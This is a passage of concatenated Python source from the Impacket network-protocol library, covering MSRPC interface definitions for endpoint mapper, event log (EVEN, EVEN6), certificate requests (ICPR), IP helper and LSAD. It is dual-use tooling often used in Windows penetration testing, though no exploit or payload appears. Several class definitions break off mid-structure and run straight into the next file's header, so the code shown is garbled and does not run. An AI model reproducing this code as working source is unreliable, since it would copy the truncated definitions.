Type\nRPC_C_EP_ALL_ELTS = 0x0\nRPC_C_EP_MATCH_BY_IF = 0x1\nRPC_C_EP_MATH_BY_OBJ = 0x2\nRPC_C_EP_MATH_BY_BOTH = 0x1\n\n# Vers Option\nRPC_C_VERS_ALL = 0x1\nRPC_C_VERS_COMPATIBLE = 0x2\nRPC_C_VERS_EXACT = 0x3\nRPC_C_VERS_MARJOR_ONLY= 0x4\nRPC_C_VERS_UPTO = 0x5\n\n# Search \nRPC_NO_MORE_ELEMENTS = 0x16c9a0d6 \n\n# Floors constants\nFLOOR_UUID_IDENTIFIER = 0x0d\n# Protocol Identifiers\nFLOOR_RPCV5_IDENTIFIER = 0x0b # DCERPC Connection Oriented v.5\nFLOOR_MSNP_IDENTIFIER = 0x0c # MS Named Pipes (LRPC)\n# Pipe Identifier\nFLOOR_NBNP_IDENTIFIER = 0x0f # NetBIOS Named Pipe\n# HostName Identifier\nFLOOR_MSNB_IDENTIFIER = 0x11 # MS NetBIOS HostName\n# PortAddr Identifier\nFLOOR_TCPPORT_IDENTIFIER = 0x07\n# HTTP Protocol\nFLOOR_HTTP_IDENTIFIER = 0x1f\n\n################################################################################\n# STRUCTURES\n################################################################################\n\n# Tower Floors: As states in C706:\n# This appendix defines the rules for encoding an protocol_tower_t (abstract)\n# into the twr_t.tower_octet_string and twr_p_t->tower_octet_string fields \n# (concrete). For historical reasons, this cannot be done using the standard NDR \n# encoding rules for marshalling and unmarshalling. A special encoding is \n# required.\n# Note that the twr_t and twr_p_t are mashalled as standard IDL data types, \n# encoded in the standard transfer syntax (for example, NDR). As far as IDL and \n# NDR are concerned, tower_octet_string is simply an opaque conformant byte \n# array. This section only defines how to construct this opaque open array of \n# octets, which contains the actual protocol tower information.\n# The tower_octet_string[ ] is a variable length array of octets that encodes \n# a single, complete protocol tower. It is encoded as follows:\n# * Addresses increase, reading from left to right.\n# * Each tower_octet_string begins with a 2-byte floor count, encoded \n# little-endian, followed by the tower floors as follows:\n# +-------------+---------+---------+---------+---------+---------+ \n# | floorcount | floor1 | floor2 | floor3 | ... | floorn | \n# +-------------+---------+---------+---------+---------+---------+\n# The number of tower floors is specific to the particular protocol tower, \n# also known as a protseq.\n# * Eachtowerfloorcontainsthefollowing:\n# |<- tower floor left hand side ->|<- tower floor right hand side ->|\n# +------------+-----------------------+------------+----------------------+\n# | LHS byte | protocol identifier | RHS byte | related or address |\n# | count | data | count | data |\n# +------------+-----------------------+------------+----------------------+\n# The LHS (Left Hand Side) of the floor contains protocol identifier information.\n# Protocol identifier values and construction rules are defined in Appendix I.\n# The RHS (Right Hand Side) of the floor contains related or addressing \n# information. The type and encoding for the currently defined protocol \n# identifiers are given in Appendix I.\n# The floor count, LHS byte count and RHS byte count are all 2-bytes, \n# in little endian format.\n#\n# So.. we're gonna use Structure to solve this\n\n# Standard Floor Assignments\nclass EPMFloor(Structure):\n structure = (\n ('LHSByteCount','H=0'),\n )\n\nEPMFloors = [ \nEPMRPCInterface,\nEPMRPCDataRepresentation,\nEPMFloor,\nEPMFloor,\nEPMFloor,\nEPMFloor\n]\n\nclass EPMTower(Structure):\n structure = (\n ('NumberOfFloors','.\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n# Itamar Mizrahi (@MrAnde7son)\n#\nfrom __future__ import division\nfrom __future__ import print_function\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDR, NDRPOINTERNULL, NDRUniConformantArray\nfrom impacket.dcerpc.v5.dtypes import ULONG, LPWSTR, RPC_UNICODE_STRING, LPSTR, NTSTATUS, NULL, PRPC_UNICODE_STRING, PULONG, USHORT, PRPC_SID, LPBYTE\nfrom impacket.dcerpc.v5.lsad import PRPC_UNICODE_STRING_ARRAY\nfrom impacket.structure import Structure\nfrom impacket import nt_errors\nfrom impacket.uuid import uuidtup_to_bin\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\n\nMSRPC_UUID_EVEN = uuidtup_to_bin(('82273FDC-E32A-18C3-3F78-827929DC23EA','0.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in nt_errors.ERROR_MESSAGES:\n error_msg_short = nt_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]\n return 'EVEN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'EVEN SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 2.2.2 EventType\nEVENTLOG_SUCCESS = 0x0000\nEVENTLOG_ERROR_TYPE = 0x0001\nEVENTLOG_WARNING_TYPE = 0x0002\nEVENTLOG_INFORMATION_TYPE = 0x0004\nEVENTLOG_AUDIT_SUCCESS = 0x0008\nEVENTLOG_AUDIT_FAILURE = 0x0010\n\n# 2.2.7 EVENTLOG_HANDLE_A and EVENTLOG_HANDLE_W\n#EVENTLOG_HANDLE_A\nEVENTLOG_HANDLE_W = LPWSTR\n\n# 2.2.9 Constants Used in Method Definitions\nMAX_STRINGS = 0x00000100\nMAX_SINGLE_EVENT = 0x0003FFFF\nMAX_BATCH_BUFF = 0x0007FFFF\n\n# 3.1.4.7 ElfrReadELW (Opnum 10)\nEVENTLOG_SEQUENTIAL_READ = 0x00000001\nEVENTLOG_SEEK_READ = 0x00000002\n\nEVENTLOG_FORWARDS_READ = 0x00000004\nEVENTLOG_BACKWARDS_READ = 0x00000008\n\n################################################################################\n# STRUCTURES\n################################################################################\n\nclass IELF_HANDLE(NDRSTRUCT):\n structure = (\n ('Data','20s=\"\"'),\n )\n def getAlignment(self):\n return 1\n\n# 2.2.3 EVENTLOGRECORD\nclass EVENTLOGRECORD(Structure):\n structure = (\n ('Length','.\n# There are test cases for them too.\n#\n# Author:\n# Itamar (@MrAnde7son)\n#\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5.dtypes import WSTR, DWORD, LPWSTR, ULONG, LARGE_INTEGER, WORD, BYTE, UUID\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray, NDRUniVaryingArray, NDRSTRUCT, NULL\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.uuid import uuidtup_to_bin\n\nMSRPC_UUID_EVEN6 = uuidtup_to_bin(('F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C', '1.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__(self):\n key = self.error_code\n if key in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]\n return 'EVEN6 SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'EVEN6 SessionError: unknown error code: 0x%x' % self.error_code\n\ndef checkNullString(string):\n if string == NULL:\n return string\n\n if string[-1:] != '\\x00':\n return string + '\\x00'\n else:\n return string\n\n################################################################################\n# CONSTANTS\n################################################################################\n\n# Evt Subscribe Flags\nEvtSubscribeToFutureEvents = 0x00000001\nEvtSubscribeStartAtOldestRecord = 0x00000002\nEvtSubscribeStartAfterBookmark = 0x00000004\n\nEvtSubscribeTolerateQueryErrors = 0x00001000\nEvtSubscribeStrict = 0x00010000\nEvtSubscribePull = 0x10000000\n\n# Evt Path Flags\nEvtQueryChannelName = 0x00000001\nEvtQueryFilePath = 0x00000002\n\n# EvtRpcExportLog\nEvtQueryTolerateQueryErrors = 0x00001000\n\n# EvtRpcRegisterLogQuery\nEvtReadOldestToNewest = 0x00000100\nEvtReadNewestToOldest = 0x00000200\n\n\n################################################################################\n# STRUCTURES\n################################################################################\n\nclass handle_t(NDRSTRUCT):\n structure = (\n ('context_handle_attributes',ULONG),\n ('context_handle_uuid',UUID),\n )\n\n def __init__(self, data=None, isNDR64=False):\n NDRSTRUCT.__init__(self, data, isNDR64)\n self['context_handle_uuid'] = b'\\x00'*16\n\n def isNull(self):\n return self['context_handle_uuid'] == b'\\x00'*16\n\nCONTEXT_HANDLE_REMOTE_SUBSCRIPTION = handle_t\n\nCONTEXT_HANDLE_LOG_HANDLE = handle_t\n\nclass PCONTEXT_HANDLE_LOG_HANDLE(NDRPOINTER):\n referent = (\n ('Data', CONTEXT_HANDLE_LOG_HANDLE),\n )\n\nCONTEXT_HANDLE_LOG_QUERY = handle_t\n\nclass PCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):\n referent = (\n ('Data', CONTEXT_HANDLE_LOG_QUERY),\n )\n\nclass LPPCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):\n referent = (\n ('Data', PCONTEXT_HANDLE_LOG_QUERY),\n )\n\nCONTEXT_HANDLE_OPERATION_CONTROL = handle_t\n\nclass PCONTEXT_HANDLE_OPERATION_CONTROL(NDRPOINTER):\n referent = (\n ('Data', CONTEXT_HANDLE_OPERATION_CONTROL),\n )\n\n# 2.2.11 EvtRpcQueryChannelInfo\nclass EvtRpcQueryChannelInfo(NDRSTRUCT):\n structure = (\n ('Name', LPWSTR),\n ('Status', DWORD),\n )\n\nclass EvtRpcQueryChannelInfoArray(NDRUniVaryingArray):\n item = EvtRpcQueryChannelInfo\n\nclass LPEvtRpcQueryChannelInfoArray(NDRPOINTER):\n referent = (\n ('Data', EvtRpcQueryChannelInfoArray)\n )\n\nclass RPC_INFO(NDRSTRUCT):\n structure = (\n ('Error', DWORD),\n ('SubError', DWORD),\n ('SubErrorParam', DWORD),\n )\n\nclass PRPC_INFO(NDRPOINTER):\n referent = (\n ('Data', RPC_INFO)\n )\n\nclass WSTR_ARRAY(NDRUniVaryingArray):\n item = WSTR\n\nclass DWORD_ARRAY(NDRUniVaryingArray):\n item = DWORD\n\nclass LPDWORD_ARRAY(NDRPOINTER):\n referent = (\n ('Data', DWORD_ARRAY)\n )\n\nclass BYTE_ARRAY(NDRUniVaryingArray):\n item = 'c'\n\nclass CBYTE_ARRAY(NDRUniVaryingArray):\n item = BYTE\n\nclass CDWORD_ARRAY(NDRUniConformantArray):\n item = DWORD\n\nclass LPBYTE_ARRAY(NDRPOINTER):\n referent = (\n ('Data', CBYTE_ARRAY)\n )\n\nclass ULONG_ARRAY(NDRUniVaryingArray):\n item = ULONG\n\n# UniConformant Pointer Array for DWORDs\nclass PCDWORD_ARRAY(NDRPOINTER):\n referent = (\n ('Data', CDWORD_ARRAY),\n )\n\nclass PDWORD_ARRAY(PCDWORD_ARRAY):\n pass\n\n# UniConformant Pointer Array for BYTEs\nclass BYTE_ARRAY_CONFORMANT(NDRUniConformantArray):\n item = 'c'\n\nclass PBYTE_ARRAY_CONFORMANT(NDRPOINTER):\n referent = (\n ('Data', BYTE_ARRAY_CONFORMANT),\n )\n\nclass PBYTE_ARRAY(PBYTE_ARRAY_CONFORMANT):\n pass\n\n# 2.3.1 EVENT_DESCRIPTOR\nclass EVENT_DESCRIPTOR(NDRSTRUCT):\n structure = (\n ('Id', WORD),\n ('Version', BYTE),\n ('Channel', BYTE),\n ('LevelSeverity', BYTE),\n ('Opcode', BYTE),\n ('Task', WORD),\n ('Keyword', ULONG),\n )\n\nclass BOOKMARK(NDRSTRUCT):\n structure = (\n ('BookmarkSize', DWORD),\n ('HeaderSize', '.\n#\n# Author:\n# Sylvain Heiniger @(sploutchy) / Compass Security (https://www.compass-security.com)\n# based on the code of Oliver Lyak (@ly4k_)\n#\n# TODO:\n# - Testcases\n#\nimport base64\nfrom typing import List\n\nfrom impacket import hresult_errors, LOG\nfrom impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, NULL, PBYTE, ULONG\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT\nfrom impacket.dcerpc.v5.nrpc import checkNullString\nfrom impacket.dcerpc.v5.rpcrt import DCERPC_v5, DCERPCException\nfrom impacket.krb5 import constants\nfrom impacket.uuid import uuidtup_to_bin\n\n\nMSRPC_UUID_ICPR = uuidtup_to_bin((\"91ae6020-9e3c-11cf-8d7c-00aa00c091be\", \"0.0\"))\n\n\"\"\"\n// RFC 4556\n77: \"KDC_ERR_INCONSISTENT_KEY_PURPOSE\"\n78: \"KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED\"\n79: \"KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED\"\n80: \"KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED\"\n81: \"KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED\"\n // RFC 6113\n90: \"KDC_ERR_PREAUTH_EXPIRED\"\n91: \"KDC_ERR_MORE_PREAUTH_DATA_REQUIRED\"\n92: \"KDC_ERR_PREAUTH_BAD_AUTHENTICATION_SET\"\n93: \"KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS\"\n\"\"\"\n\nKRB5_ERROR_MESSAGES = constants.ERROR_MESSAGES\nif 77 not in KRB5_ERROR_MESSAGES:\n KRB5_ERROR_MESSAGES.update(\n {\n 77: (\n \"KDC_ERR_INCONSISTENT_KEY_PURPOSE\",\n \"Certificate cannot be used for PKINIT client authentication\",\n ),\n 78: (\n \"KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED\",\n \"Digest algorithm for the public key in the certificate is not acceptable by the KDC\",\n ),\n 79: (\n \"KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED\",\n \"The paChecksum filed in the request is not present\",\n ),\n 80: (\n \"KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED\",\n \"The digest algorithm used by the id-pkinit-authData is not acceptable by the KDC\",\n ),\n 81: (\n \"KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED\",\n \"The KDC does not support the public key encryption key delivery method\",\n ),\n 90: (\n \"KDC_ERR_PREAUTH_EXPIRED\",\n \"The conversation is too old and needs to restart\",\n ),\n 91: (\n \"KDC_ERR_MORE_PREAUTH_DATA_REQUIRED\",\n \"Additional pre-authentication required\",\n ),\n 92: (\n \"KDC_ERR_PREAUTH_BAD_AUTHENTICATION_SET\",\n \"KDC cannot accommodate requested padata element\",\n ),\n 93: (\"KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS\", \"Unknown critical option\"),\n }\n )\n\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__(self) -> str:\n self.error_code &= 0xFFFFFFFF\n error_msg = translate_error_code(self.error_code)\n return \"RequestSessionError: %s\" % error_msg\n\n\n################################################################################\n# STRUCTURES\n################################################################################\n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/d6bee093-d862-4122-8f2b-7b49102097dc\n# [MS-WCCE] 2.2.2.2\nclass CERTTRANSBLOB(NDRSTRUCT):\n structure = (\n (\"cb\", ULONG),\n (\"pb\", PBYTE),\n )\n\n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7\nclass CertServerRequest(NDRCALL):\n opnum = 0\n structure = (\n (\"dwFlags\", DWORD),\n (\"pwszAuthority\", LPWSTR),\n (\"pdwRequestId\", DWORD),\n (\"pctbAttribs\", CERTTRANSBLOB),\n (\"pctbRequest\", CERTTRANSBLOB),\n )\n\n\n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7\nclass CertServerRequestResponse(NDRCALL):\n structure = (\n (\"pdwRequestId\", DWORD),\n (\"pdwDisposition\", ULONG),\n (\"pctbCert\", CERTTRANSBLOB),\n (\"pctbEncodedCert\", CERTTRANSBLOB),\n (\"pctbDispositionMessage\", CERTTRANSBLOB),\n )\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\n\ndef translate_error_code(error_code: int) -> str:\n error_code &= 0xFFFFFFFF\n if error_code in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[error_code][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[error_code][1]\n return \"code: 0x%x - %s - %s\" % (\n error_code,\n error_msg_short,\n error_msg_verbose,\n )\n else:\n return \"unknown error code: 0x%x\" % error_code\n\ndef hCertServerRequest(\n dce: DCERPC_v5,\n csr: bytes,\n attributes: List[str],\n request_id: int = 0,\n ca: str = \"\"\n) -> str:\n attribs = checkNullString(\"\\n\".join(attributes)).encode(\"utf-16le\")\n pctb_attribs = CERTTRANSBLOB()\n pctb_attribs[\"cb\"] = len(attribs)\n pctb_attribs[\"pb\"] = attribs\n\n pctb_request = CERTTRANSBLOB()\n pctb_request[\"cb\"] = len(csr)\n pctb_request[\"pb\"] = csr\n\n request = CertServerRequest()\n request[\"dwFlags\"] = 0\n request[\"pwszAuthority\"] = checkNullString(ca)\n request[\"pdwRequestId\"] = request_id\n request[\"pctbAttribs\"] = pctb_attribs\n request[\"pctbRequest\"] = pctb_request\n\n response = dce.request(request)\n\n error_code = response[\"pdwDisposition\"]\n request_id = response[\"pdwRequestId\"]\n\n if error_code == 3:\n LOG.info(\"Successfully requested certificate\")\n else:\n if error_code == 5:\n LOG.warning(\"Certificate request is pending approval\")\n else:\n error_msg = translate_error_code(error_code)\n if \"unknown error code\" in error_msg:\n LOG.error(\n \"Got unknown error while trying to request certificate: (%s): %s\"\n % (\n error_msg,\n b\"\".join(response[\"pctbDispositionMessage\"][\"pb\"]).decode(\n \"utf-16le\"\n ),\n )\n )\n else:\n LOG.error(\n \"Got error while trying to request certificate: %s\" % error_msg\n )\n\n LOG.info(\"Request ID is %d\" % request_id)\n\n return b\"\".join(response[\"pctbEncodedCert\"][\"pb\"])" }, { "path": "impacket/dcerpc/v5/iphlp.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Implementation of iphlpsvc.dll MSRPC calls (Service that offers IPv6 connectivity over an IPv4 network)\n#\n# Authors:\n# Arseniy Sharoglazov / Positive Technologies (https://www.ptsecurity.com/)\n#\n\nfrom socket import inet_aton\n\nfrom impacket import uuid\nfrom impacket import hresult_errors\nfrom impacket.uuid import uuidtup_to_bin\nfrom impacket.dcerpc.v5.dtypes import BYTE, ULONG, WSTR, GUID, NULL\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\n\nMSRPC_UUID_IPHLP_IP_TRANSITION = uuidtup_to_bin(('552d076a-cb29-4e44-8b6a-d15e59e2c0af', '1.0'))\n\n# RPC_IF_ALLOW_LOCAL_ONLY\nMSRPC_UUID_IPHLP_TEREDO = uuidtup_to_bin(('ecbdb051-f208-46b9-8c8b-648d9d3f3944', '1.0'))\nMSRPC_UUID_IPHLP_TEREDO_CONSUMER = uuidtup_to_bin(('1fff8faa-ec23-4e3f-a8ce-4b2f8707e636', '1.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]\n return 'IPHLP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'IPHLP SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n\n# Notification types\nNOTIFICATION_ISATAP_CONFIGURATION_CHANGE = 0\nNOTIFICATION_PROCESS6TO4_CONFIGURATION_CHANGE = 1\nNOTIFICATION_TEREDO_CONFIGURATION_CHANGE = 2\nNOTIFICATION_IP_TLS_CONFIGURATION_CHANGE = 3\nNOTIFICATION_PORT_CONFIGURATION_CHANGE = 4\nNOTIFICATION_DNS64_CONFIGURATION_CHANGE = 5\nNOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX = 6\n\n################################################################################\n# STRUCTURES\n################################################################################\n\nclass BYTE_ARRAY(NDRUniConformantArray):\n item = 'c'\n\n################################################################################\n# RPC CALLS\n################################################################################\n\n# Opnum 0\nclass IpTransitionProtocolApplyConfigChanges(NDRCALL):\n opnum = 0\n structure = (\n ('NotificationNum', BYTE),\n )\n\nclass IpTransitionProtocolApplyConfigChangesResponse(NDRCALL):\n structure = (\n ('ErrorCode', ULONG),\n )\n\n# Opnum 1\nclass IpTransitionProtocolApplyConfigChangesEx(NDRCALL):\n opnum = 1\n structure = (\n ('NotificationNum', BYTE),\n ('DataLength', ULONG),\n ('Data', BYTE_ARRAY),\n )\n\nclass IpTransitionProtocolApplyConfigChangesExResponse(NDRCALL):\n structure = (\n ('ErrorCode', ULONG),\n )\n\n# Opnum 2\nclass IpTransitionCreatev6Inv4Tunnel(NDRCALL):\n opnum = 2\n structure = (\n ('LocalAddress', \"4s=''\"),\n ('RemoteAddress', \"4s=''\"),\n ('InterfaceName', WSTR),\n )\n\nclass IpTransitionCreatev6Inv4TunnelResponse(NDRCALL):\n structure = (\n ('ErrorCode', ULONG),\n )\n\n# Opnum 3\nclass IpTransitionDeletev6Inv4Tunnel(NDRCALL):\n opnum = 3\n structure = (\n ('TunnelGuid', GUID),\n )\n\nclass IpTransitionDeletev6Inv4TunnelResponse(NDRCALL):\n structure = (\n ('ErrorCode', ULONG),\n )\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\n\nOPNUMS = {\n 0 : (IpTransitionProtocolApplyConfigChanges, IpTransitionProtocolApplyConfigChangesResponse),\n 1 : (IpTransitionProtocolApplyConfigChangesEx, IpTransitionProtocolApplyConfigChangesExResponse),\n 2 : (IpTransitionCreatev6Inv4Tunnel, IpTransitionCreatev6Inv4TunnelResponse),\n 3 : (IpTransitionDeletev6Inv4Tunnel, IpTransitionDeletev6Inv4TunnelResponse)\n}\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\ndef checkNullString(string):\n if string == NULL:\n return string\n\n if string[-1:] != '\\x00':\n return string + '\\x00'\n else:\n return string\n\n# For all notifications except EX\ndef hIpTransitionProtocolApplyConfigChanges(dce, notification_num):\n request = IpTransitionProtocolApplyConfigChanges()\n request['NotificationNum'] = notification_num\n\n return dce.request(request)\n\n# Only for NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX\n# No admin required\ndef hIpTransitionProtocolApplyConfigChangesEx(dce, notification_num, notification_data):\n request = IpTransitionProtocolApplyConfigChangesEx()\n request['NotificationNum'] = notification_num\n request['DataLength'] = len(notification_data)\n request['Data'] = notification_data\n\n return dce.request(request)\n\n# Same as netsh interface ipv6 add v6v4tunnel \"Test Tunnel\" 192.168.0.1 10.0.0.5\ndef hIpTransitionCreatev6Inv4Tunnel(dce, local_address, remote_address, interface_name):\n request = IpTransitionCreatev6Inv4Tunnel()\n request['LocalAddress'] = inet_aton(local_address)\n request['RemoteAddress'] = inet_aton(remote_address)\n\n request['InterfaceName'] = checkNullString(interface_name)\n request.fields['InterfaceName'].fields['MaximumCount'] = 256\n\n return dce.request(request)\n\ndef hIpTransitionDeletev6Inv4Tunnel(dce, tunnel_guid):\n request = IpTransitionDeletev6Inv4Tunnel()\n request['TunnelGuid'] = uuid.string_to_bin(tunnel_guid)\n\n return dce.request(request)\n" }, { "path": "impacket/dcerpc/v5/lsad.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-LSAD] Interface implementation\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Some calls have helper functions, which makes it even easier to use.\n# They are located at the end of this file.\n# Helper functions start with \"h\".\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\nfrom __future__ import division\nfrom __future__ import print_function\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRENUM, NDRUNION, NDRUniConformantVaryingArray, NDRPOINTER, NDR, NDRSTRUCT, \\\n NDRUniConformantArray\nfrom impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, STR, LUID, LONG, ULONG, RPC_UNICODE_STRING, PRPC_SID, LPBYTE, \\\n LARGE_INTEGER, NTSTATUS, RPC_SID, ACCESS_MASK, UCHAR, PRPC_UNICODE_STRING, PLARGE_INTEGER, USHORT, \\\n SECURITY_INFORMATION, NULL, MAXIMUM_ALLOWED, GUID, SECURITY_DESCRIPTOR, OWNER_SECURITY_INFORMATION\nfrom impacket import nt_errors\nfrom impacket.uuid import uuidtup_to_bin\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\n\nMSRPC_UUID_LSAD = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in nt_errors.ERROR_MESSAGES:\n error_msg_short = nt_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] \n return 'LSAD SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'LSAD SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 2.2.1.1.2 ACCESS_MASK for Policy Objects\nPOLICY_VIEW_LOCAL_INFORMATION = 0x00000001\nPOLICY_VIEW_AUDIT_INFORMATION = 0x00000002\nPOLICY_GET_PRIVATE_INFORMATION = 0x00000004\nPOLICY_TRUST_ADMIN = 0x00000008\nPOLICY_CREATE_ACCOUNT = 0x00000010\nPOLICY_CREATE_SECRET = 0x00000020\nPOLICY_CREATE_PRIVILEGE = 0x00000040\nPOLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080\nPOLICY_SET_AUDIT_REQUIREMENTS = 0x00000100\nPOLICY_AUDIT_LOG_ADMIN = 0x00000200\nPOLICY_SERVER_ADMIN = 0x00000400\nPOLICY_LOOKUP_NAMES = 0x00000800\nPOLICY_NOTIFICATION = 0x00001000\n\n# 2.2.1.1.3 ACCESS_MASK for Account Objects\nACCOUNT_VIEW = 0x00000001\nACCOUNT_ADJUST_PRIVILEGES = 0x00000002\nACCOUNT_ADJUST_QUOTAS = 0x00000004\nACCOUNT_ADJUST_SYSTEM_ACCESS = 0x00000008\n\n# 2.2.1.1.4 ACCESS_MASK for Secret Objects\nSECRET_SET_VALUE = 0x00000001\nSECRET_QUERY_VALUE = 0x00000002\n\n# 2.2.1.1.5 ACCESS_MASK for Trusted Domain Objects\nTRUSTED_QUERY_DOMAIN_NAME = 0x00000001\nTRUSTED_QUERY_CONTROLLERS = 0x00000002\nTRUSTED_SET_CONTROLLERS = 0x00000004\nTRUSTED_QUERY_POSIX = 0x00000008\nTRUSTED_SET_POSIX = 0x00000010\nTRUSTED_SET_AUTH = 0x00000020\nTRUSTED_QUERY_AUTH = 0x00000040\n\n# 2.2.1.2 POLICY_SYSTEM_ACCESS_MODE\nPOLICY_MODE_INTERACTIVE = 0x00000001\nPOLICY_MODE_NETWORK = 0x00000002\nPOLICY_MODE_BATCH = 0x00000004\nPOLICY_MODE_SERVICE = 0x00000010\nPOLICY_MODE_DENY_INTERACTIVE = 0x00000040\nPOLICY_MODE_DENY_NETWORK = 0x00000080\nPOLICY_MODE_DENY_BATCH = 0x00000100\nPOLICY_MODE_DENY_SERVICE = 0x00000200\nPOLICY_MODE_REMOTE_INTERACTIVE = 0x00000400\nPOLICY_MODE_DENY_REMOTE_INTERACTIVE = 0x00000800\nPOLICY_MODE_ALL = 0x00000FF7\nPOLICY_MODE_ALL_NT4 = 0x00000037\n\n# 2.2.4.4 LSAPR_POLICY_AUDIT_EVENTS_INFO\n# EventAuditingOptions\nPOLICY_AUDIT_EVENT_UNCHANGED = 0x00000000\nPOLICY_AUDIT_EVENT_NONE = 0x00000004\nPOLICY_AUDIT_EVENT_SUCCESS = 0x00000001\nPOLICY_AUDIT_EVENT_FAILURE = 0x00000002\n\n# 2.2.4.19 POLICY_DOMAIN_KERBEROS_TICKET_INFO\n# AuthenticationOptions\nPOLICY_KERBEROS_VALIDATE_CLIENT = 0x00000080\n\n# 2.2.7.21 LSA_FOREST_TRUST_RECORD\n# Flags\nLSA_TLN_DISABLED_NEW = 0x00000001\nLSA_TLN_DISABLED_ADMIN = 0x00000002\nLSA_TLN_DISABLED_CONFLICT = 0x00000004\nLSA_SID_DISABLED_ADMIN = 0x00000001\nLSA_SID_DISABLED_CONFLICT = 0x00000002\nLSA_NB_DISABLED_ADMIN = 0x00000004\nLSA_NB_DISABLED_CONFLICT = 0x00000008\nLSA_FTRECORD_DISABLED_REASONS = 0x0000FFFF\n\n################################################################################\n# STRUCTURES\n################################################################################\n# 2.2.2.1 LSAPR_HANDLE\nclass LSAPR_HANDLE(NDRSTRUCT):\n align = 1\n structure = (\n ('Data','20s=\"\"'),\n )\n\n# 2.2.2.3 LSA_UNICODE_STRING\nLSA_UNICODE_STRING = 